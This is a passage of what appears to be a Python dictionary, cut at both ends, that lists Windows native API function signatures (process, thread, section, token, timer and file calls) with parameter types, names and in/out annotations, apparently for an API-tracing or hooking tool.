'PHANDLE', 'PLPC_MESSAGE', 'PLPC_MESSAGE'], ['PortHandle', 'ReceivePortHandle', 'Reply', 'IncomingRequest'], 'NTSTATUS', ['__IN', '__OUT_opt', '__IN_opt', '__OUT']), 'NtReplyWaitReplyPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Reply'], 'NTSTATUS', ['__IN', '__IN_OUT']), 'NtRequestPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Request'], 'NTSTATUS', ['__IN', '__IN']), 'NtRequestWaitReplyPort': (3, ['HANDLE', 'PLPC_MESSAGE', 'PLPC_MESSAGE'], ['PortHandle', 'Request', 'IncomingReply'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtWriteRequestData': (6, ['HANDLE', 'PLPC_MESSAGE', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['PortHandle', 'Request', 'DataIndex', 'Buffer', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__OUT_opt']), 'NtCreateProcess': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'BOOLEAN', 'HANDLE', 'HANDLE', 'HANDLE'], ['ProcessHandle', 'DesiredAccess', 'ObjectAttributes', 'ParentProcess', 'InheritObjectTable', 'SectionHandle', 'DebugPort', 'ExceptionPort'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtFlushInstructionCache': (3, ['HANDLE', 'PVOID', 'ULONG'], ['ProcessHandle', 'BaseAddress', 'NumberOfBytesToFlush'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtOpenProcess': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PCLIENT_ID'], ['ProcessHandle', 'AccessMask', 'ObjectAttributes', 'ClientId'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtQueryInformationProcess': (5, ['HANDLE', 'PROCESS_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'ProcessInformationClass', 'ProcessInformation', 'ProcessInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetInformationProcess': (4, ['HANDLE', 'PROCESS_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ProcessHandle', 'ProcessInformationClass', 'ProcessInformation', 'ProcessInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtTerminateProcess': (2, ['HANDLE', 'NTSTATUS'], ['ProcessHandle', 'ExitStatus'], 'NTSTATUS', ['__IN_opt', '__IN']), 'RtlCreateUserProcess': (10, ['PUNICODE_STRING', 'ULONG', 'PRTL_USER_PROCESS_PARAMETERS', 'PSECURITY_DESCRIPTOR', 'PSECURITY_DESCRIPTOR', 'HANDLE', 'BOOLEAN', 'HANDLE', 'HANDLE', 'PRTL_USER_PROCESS_INFORMATION'], ['ImagePath', 'ObjectAttributes', 'ProcessParameters', 'ProcessSecurityDescriptor', 'ThreadSecurityDescriptor', 'ParentProcess', 'InheritHandles', 'DebugPort', 'ExceptionPort', 'ProcessInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_opt', '__OUT']), 'NtCreateProfile': (9, ['PHANDLE', 'HANDLE', 'PVOID', 'ULONG', 'ULONG', 'PVOID', 'ULONG', 'KPROFILE_SOURCE', 'KAFFINITY'], ['ProfileHandle', 'Process', 'ImageBase', 'ImageSize', 'BucketSize', 'Buffer', 'BufferSize', 'ProfileSource', 'Affinity'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtQueryIntervalProfile': (2, ['KPROFILE_SOURCE', 'PULONG'], ['ProfileSource', 'Interval'], 'NTSTATUS', ['__IN', '__OUT']), 'NtSetIntervalProfile': (2, ['ULONG', 'KPROFILE_SOURCE'], ['Interval', 'Source'], 'NTSTATUS', ['__IN', '__IN']), 'NtStartProfile': (1, ['HANDLE'], ['ProfileHandle'], 'NTSTATUS', ['__IN']), 'NtStopProfile': (1, ['HANDLE'], ['ProfileHandle'], 'NTSTATUS', ['__IN']), 'NtCreateSection': (7, ['PHANDLE', 'ULONG', 'POBJECT_ATTRIBUTES', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'HANDLE'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes', 'MaximumSize', 'PageAttributess', 'SectionAttributes', 'FileHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt']), 'NtExtendSection': (2, ['HANDLE', 'PLARGE_INTEGER'], ['SectionHandle', 'NewSectionSize'], 'NTSTATUS', ['__IN', '__IN']), 'NtMapViewOfSection': (10, ['HANDLE', 'HANDLE', 'PVOID', 'ULONG', 'ULONG', 'PLARGE_INTEGER', 'PULONG', 'DWORD', 'ULONG', 'ULONG'], ['SectionHandle', 'ProcessHandle', '*BaseAddress', 'ZeroBits', 'CommitSize', 'SectionOffset', 'ViewSize', 'InheritDisposition', 'AllocationType', 'Protect'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT_opt', '__IN_opt', '__IN', '__IN_OUT_opt', '__IN_OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenSection': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQuerySection': (5, ['HANDLE', 'SECTION_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['SectionHandle', 'InformationClass', 'InformationBuffer', 'InformationBufferSize', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtUnmapViewOfSection': (2, ['HANDLE', 'PVOID'], ['ProcessHandle', 'BaseAddress'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateSemaphore': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG'], ['SemaphoreHandle', 'DesiredAccess', 'ObjectAttributes', 'InitialCount', 'MaximumCount'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN']), 'NtOpenSemaphore': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['SemaphoreHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQuerySemaphore': (5, ['HANDLE', 'SEMAPHORE_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['SemaphoreHandle', 'SemaphoreInformationClass', 'SemaphoreInformation', 'SemaphoreInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReleaseSemaphore': (3, ['HANDLE', 'ULONG', 'PULONG'], ['SemaphoreHandle', 'ReleaseCount', 'PreviousCount'], 'NTSTATUS', ['__IN', '__IN', '__OUT_opt']), 'NtCreateSymbolicLinkObject': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PUNICODE_STRING'], ['pHandle', 'DesiredAccess', 'ObjectAttributes', 'DestinationName'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtOpenSymbolicLinkObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['pHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQuerySymbolicLinkObject': (3, ['HANDLE', 'PUNICODE_STRING', 'PULONG'], ['SymbolicLinkHandle', 'pLinkName', 'pDataWritten'], 'NTSTATUS', ['__IN', '__OUT', '__OUT_opt']), 'NtAlertResumeThread': (2, ['HANDLE', 'PULONG'], ['ThreadHandle', 'SuspendCount'], 'NTSTATUS', ['__IN', '__OUT']), 'NtContinue': (2, ['PCONTEXT', 'BOOLEAN'], ['ThreadContext', 'RaiseAlert'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateThread': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'PCLIENT_ID', 'PCONTEXT', 'PINITIAL_TEB', 'BOOLEAN'], ['ThreadHandle', 'DesiredAccess', 'ObjectAttributes', 'ProcessHandle', 'ClientId', 'ThreadContext', 'InitialTeb', 'CreateSuspended'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtCurrentTeb': (0, [], [], 'PTEB', []), 'NtDelayExecution': (2, ['BOOLEAN', 'PLARGE_INTEGER'], ['Alertable', 'DelayInterval'], 'NTSTATUS', ['__IN', '__IN']), 'NtImpersonateThread': (3, ['HANDLE', 'HANDLE', 'PSECURITY_QUALITY_OF_SERVICE'], ['ThreadHandle', 'ThreadToImpersonate', 'SecurityQualityOfService'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtOpenThread': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PCLIENT_ID'], ['ThreadHandle', 'AccessMask', 'ObjectAttributes', 'ClientId'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtQueryInformationThread': (5, ['HANDLE', 'THREAD_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ThreadHandle', 'ThreadInformationClass', 'ThreadInformation', 'ThreadInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtRegisterThreadTerminatePort': (1, ['HANDLE'], ['PortHandle'], 'NTSTATUS', ['__IN']), 'NtResumeThread': (2, ['HANDLE', 'PULONG'], ['ThreadHandle', 'SuspendCount'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetInformationThread': (4, ['HANDLE', 'THREAD_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ThreadHandle', 'ThreadInformationClass', 'ThreadInformation', 'ThreadInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSuspendThread': (2, ['HANDLE', 'PULONG'], ['ThreadHandle', 'PreviousSuspendCount'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtTerminateThread': (2, ['HANDLE', 'NTSTATUS'], ['ThreadHandle', 'ExitStatus'], 'NTSTATUS', ['__IN', '__IN']), 'NtYieldExecution': (0, [], [], 'NTSTATUS', []), 'RtlCreateUserThread': (10, ['HANDLE', 'PSECURITY_DESCRIPTOR', 'BOOLEAN', 'ULONG', 'PULONG', 'PULONG', 'PVOID', 'PVOID', 'PHANDLE', 'PCLIENT_ID'], ['ProcessHandle', 'SecurityDescriptor', 'CreateSuspended', 'StackZeroBits', 'StackReserved', 'StackCommit', 'StartAddress', 'StartParameter', 'ThreadHandle', 'ClientID'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__IN', '__IN_OUT', '__IN_OUT', '__IN', '__IN_opt', '__OUT', '__OUT']), 'NtCancelTimer': (2, ['HANDLE', 'PBOOLEAN'], ['TimerHandle', 'CurrentState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtCreateTimer': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'TIMER_TYPE'], ['TimerHandle', 'DesiredAccess', 'ObjectAttributes', 'TimerType'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenTimer': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['TimerHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryTimer': (5, ['HANDLE', 'TIMER_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['TimerHandle', 'TimerInformationClass', 'TimerInformation', 'TimerInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtSetTimer': (7, ['HANDLE', 'PLARGE_INTEGER', 'PTIMER_APC_ROUTINE', 'PVOID', 'BOOLEAN', 'LONG', 'PBOOLEAN'], ['TimerHandle', 'DueTime', 'TimerApcRoutine', 'TimerContext', 'ResumeTimer', 'Period', 'PreviousState'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__OUT_opt']), 'NtAdjustGroupsToken': (6, ['HANDLE', 'BOOLEAN', 'PTOKEN_GROUPS', 'ULONG', 'PTOKEN_GROUPS', 'PULONG'], ['TokenHandle', 'ResetToDefault', 'TokenGroups', 'PreviousGroupsLength', 'PreviousGroups', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt', '__OUT_opt']), 'NtAdjustPrivilegesToken': (6, ['HANDLE', 'BOOLEAN', 'PTOKEN_PRIVILEGES', 'ULONG', 'PTOKEN_PRIVILEGES', 'PULONG'], ['TokenHandle', 'DisableAllPrivileges', 'TokenPrivileges', 'PreviousPrivilegesLength', 'PreviousPrivileges', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt', '__OUT_opt']), 'NtCreateToken': (13, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'TOKEN_TYPE', 'PLUID', 'PLARGE_INTEGER', 'PTOKEN_USER', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_OWNER', 'PTOKEN_PRIMARY_GROUP', 'PTOKEN_DEFAULT_DACL', 'PTOKEN_SOURCE'], ['TokenHandle', 'DesiredAccess', 'ObjectAttributes', 'TokenType', 'AuthenticationId', 'ExpirationTime', 'TokenUser', 'TokenGroups', 'TokenPrivileges', 'TokenOwner', 'TokenPrimaryGroup', 'TokenDefaultDacl', 'TokenSource'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtDuplicateToken': (6, ['HANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'SECURITY_IMPERSONATION_LEVEL', 'TOKEN_TYPE', 'PHANDLE'], ['ExistingToken', 'DesiredAccess', 'ObjectAttributes', 'ImpersonationLevel', 'TokenType', 'NewToken'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN', '__OUT']), 'NtOpenProcessToken': (3, ['HANDLE', 'ACCESS_MASK', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtOpenThreadToken': (4, ['HANDLE', 'ACCESS_MASK', 'BOOLEAN', 'PHANDLE'], ['ThreadHandle', 'DesiredAccess', 'OpenAsSelf', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtQueryInformationToken': (5, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetInformationToken': (4, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN']), 'NtAccessCheckAndAuditAlarm': (11, ['PUNICODE_STRING', 'HANDLE', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'ACCESS_MASK', 'PGENERIC_MAPPING', 'BOOLEAN', 'PULONG', 'PULONG', 'PBOOLEAN'], ['SubsystemName', 'ObjectHandle', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'DesiredAccess', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'AccessStatus', 'GenerateOnClose'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__OUT', '__OUT', '__OUT']), 'NtCloseObjectAuditAlarm': (3, ['PUNICODE_STRING', 'HANDLE', 'BOOLEAN'], ['SubsystemName', 'ObjectHandle', 'GenerateOnClose'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN']), 'NtDeleteObjectAuditAlarm': (3, ['PUNICODE_STRING', 'HANDLE', 'BOOLEAN'], ['SubsystemName', 'ObjectHandle', 'GenerateOnClose'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN']), 'NtOpenObjectAuditAlarm': (12, ['PUNICODE_STRING', 'PHANDLE', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'HANDLE', 'ACCESS_MASK', 'ACCESS_MASK', 'PPRIVILEGE_SET', 'BOOLEAN', 'BOOLEAN', 'PBOOLEAN'], ['SubsystemName', 'ObjectHandle', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'ClientToken', 'DesiredAccess', 'GrantedAccess', 'Privileges', 'ObjectCreation', 'AccessGranted', 'GenerateOnClose'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN', '__OUT_opt']), 'NtPrivilegeObjectAuditAlarm': (6, ['PUNICODE_STRING', 'HANDLE', 'HANDLE', 'ULONG', 'PPRIVILEGE_SET', 'BOOLEAN'], ['SubsystemName', 'ObjectHandle', 'ClientToken', 'DesiredAccess', 'ClientPrivileges', 'AccessGranted'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__IN', '__IN', '__IN']), 'NtPrivilegedServiceAuditAlarm': (5, ['PUNICODE_STRING', 'PUNICODE_STRING', 'HANDLE', 'PPRIVILEGE_SET', 'BOOLEAN'], ['SubsystemName', 'ServiceName', 'ClientToken', 'ClientPrivileges', 'AccessGranted'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__IN', '__IN']), 'NtAccessCheck': (8, ['PSECURITY_DESCRIPTOR', 'HANDLE', 'ACCESS_MASK', 'PGENERIC_MAPPING', 'PPRIVILEGE_SET', 'PULONG', 'PACCESS_MASK', 'PNTSTATUS'], ['SecurityDescriptor', 'ClientToken', 'DesiredAccess', 'GenericMapping', 'RequiredPrivilegesBuffer', 'BufferLength', 'GrantedAccess', 'AccessStatus'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt', '__OUT', '__IN_OUT', '__OUT', '__OUT']), 'NtAllocateLocallyUniqueId': (1, ['PLUID'], ['LocallyUniqueId'], 'NTSTATUS', ['__OUT']), 'NtAllocateUuids': (3, ['PLARGE_INTEGER', 'PULONG', 'PULONG'], ['Time', 'Range', 'Sequence'], 'NTSTATUS', ['__OUT', '__OUT', '__OUT']), 'NtPrivilegeCheck': (3, ['HANDLE', 'PPRIVILEGE_SET', 'PBOOLEAN'], ['TokenHandle', 'RequiredPrivileges', 'Result'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtQuerySystemInformation': (4, ['SYSTEM_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['SystemInformationClass', 'SystemInformation', 'SystemInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__OUT_opt']), 'NtSetSystemInformation': (3, ['SYSTEM_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['SystemInformationClass', 'SystemInformation', 'SystemInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtGetTickCount': (0, [], [], 'ULONG', []), 'NtQueryPerformanceCounter': (2, ['PLARGE_INTEGER', 'PLARGE_INTEGER'], ['PerformanceCounter', 'PerformanceFrequency'], 'NTSTATUS', ['__OUT', '__OUT_opt']), 'NtQuerySystemTime': (1, ['PLARGE_INTEGER'], ['SystemTime'], 'NTSTATUS', ['__OUT']), 'NtQueryTimerResolution': (3, ['PULONG', 'PULONG', 'PULONG'], ['MinimumResolution', 'MaximumResolution', 'CurrentResolution'], 'NTSTATUS', ['__OUT', '__OUT', '__OUT']), 'NtSetSystemTime': (2, ['PLARGE_INTEGER', 'PLARGE_INTEGER'], ['SystemTime', 'PreviousTime'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetTimerResolution': (3, ['ULONG', 'BOOLEAN', 'PULONG'], ['DesiredResolution', 'SetResolution', 'CurrentResolution'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'RtlTimeFieldsToTime': (2, ['PTIME_FIELDS', 'PLARGE_INTEGER'], ['TimeFields', 'Time'], 'BOOLEAN', ['__IN', '__OUT']), 'RtlTimeToTimeFields': (2, ['PLARGE_INTEGER', 'PTIME_FIELDS'], ['Time', 'TimeFields'], 'VOID', ['__IN', '__OUT']), 'NtAllocateVirtualMemory': (6, ['HANDLE', 'PVOID', 'ULONG_PTR', 'PSIZE_T', 'ULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'ZeroBits', 'RegionSize', 'AllocationType', 'Protect'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN', '__IN_OUT', '__IN', '__IN']), 'NtClose': (1, ['HANDLE'], ['Handle'], 'NTSTATUS', ['__IN']), 'NtCreateFile': (11, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'AllocationSize', 'FileAttributes', 'ShareAccess', 'CreateDisposition', 'CreateOptions', 'EaBuffer', 'EaLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtCreateSection': (7, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'HANDLE'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes', 'MaximumSize', 'SectionPageProtection', 'AllocationAttributes', 'FileHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt']), 'NtDeviceIoControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'IoControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtDuplicateToken': (6, ['HANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'BOOLEAN', 'TOKEN_TYPE', 'PHANDLE'], ['ExistingTokenHandle', 'DesiredAccess', 'ObjectAttributes', 'EffectiveOnly', 'TokenType', 'NewTokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtFlushBuffersFileEx': (5, ['HANDLE', 'ULONG', 'PVOID', 'ULONG', 'PIO_STATUS_BLOCK'], ['FileHandle', 'Flags', 'Parameters', 'ParametersSize', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtFreeVirtualMemory': (4, ['HANDLE', 'PVOID', 'PSIZE_T', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'RegionSize', 'FreeType'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT', '__IN']), 'NtFsControlFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FsControlCode', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN']), 'NtLockFile': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'ULONG', 'BOOLEAN', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'ByteOffset', 'Length', 'Key', 'FailImmediately', 'ExclusiveLock'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtOpenFile': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'ULONG', 'ULONG'], ['FileHandle', 'DesiredAccess', 'ObjectAttributes', 'IoStatusBlock', 'ShareAccess', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtOpenProcessToken': (3, ['HANDLE', 'ACCESS_MASK', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtOpenProcessTokenEx': (4, ['HANDLE', 'ACCESS_MASK', 'ULONG', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'HandleAttributes', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtOpenThreadToken': (4, ['HANDLE', 'ACCESS_MASK', 'BOOLEAN', 'PHANDLE'], ['ThreadHandle', 'DesiredAccess', 'OpenAsSelf', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtOpenThreadTokenEx': (5, ['HANDLE', 'ACCESS_MASK', 'BOOLEAN', 'ULONG', 'PHANDLE'], ['ThreadHandle', 'DesiredAccess', 'OpenAsSelf', 'HandleAttributes', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtPrivilegeCheck': (3, ['HANDLE', 'PPRIVILEGE_SET', 'PBOOLEAN'], ['ClientToken', 'RequiredPrivileges', 'Result'], 'NTSTATUS', ['__IN', '__IN_OUT', '__OUT']), 'NtQueryDirectoryFile': (11, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'BOOLEAN', 'PUNICODE_STRING', 'BOOLEAN'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'ReturnSingleEntry', 'FileName', 'RestartScan'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryDirectoryFileEx': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS', 'ULONG', 'PUNICODE_STRING'], ['FileHandle', 'Event', 'ApcRoutine', 'ApcContext', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass', 'QueryFlags', 'FileName'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtQueryInformationFile': (5, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE_INFORMATION_CLASS'], ['FileHandle', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtQueryInformationToken': (5, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtQueryObject': (5, ['HANDLE', 'OBJECT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['Handle', 'ObjectInformationClass', 'ObjectInformation', 'ObjectInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN_opt', '__IN', '__OUT_opt', '__IN', '__OUT_opt']), 'NtQueryQuotaInformationFile': (9, ['HANDLE', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'PSID', 'BOOLEAN'], ['FileHandle', 'IoStatusBlock', 'Buffer', 'Length', 'ReturnSingleEntry', 'SidList', 'SidListLength', 'StartSid', 'RestartScan'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN']), 'NtQuerySecurityObject': (5, ['HANDLE', 'SECURITY_INFORMATION', 'PSECURITY_DESCRIPTOR', 'ULONG', 'PULONG'], ['Handle', 'SecurityInformation', 'SecurityDescriptor', 'Length', 'LengthNeeded'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtQueryVirtualMemory': (6, ['HANDLE', 'PVOID', 'MEMORY_INFORMATION_CLASS', 'PVOID', 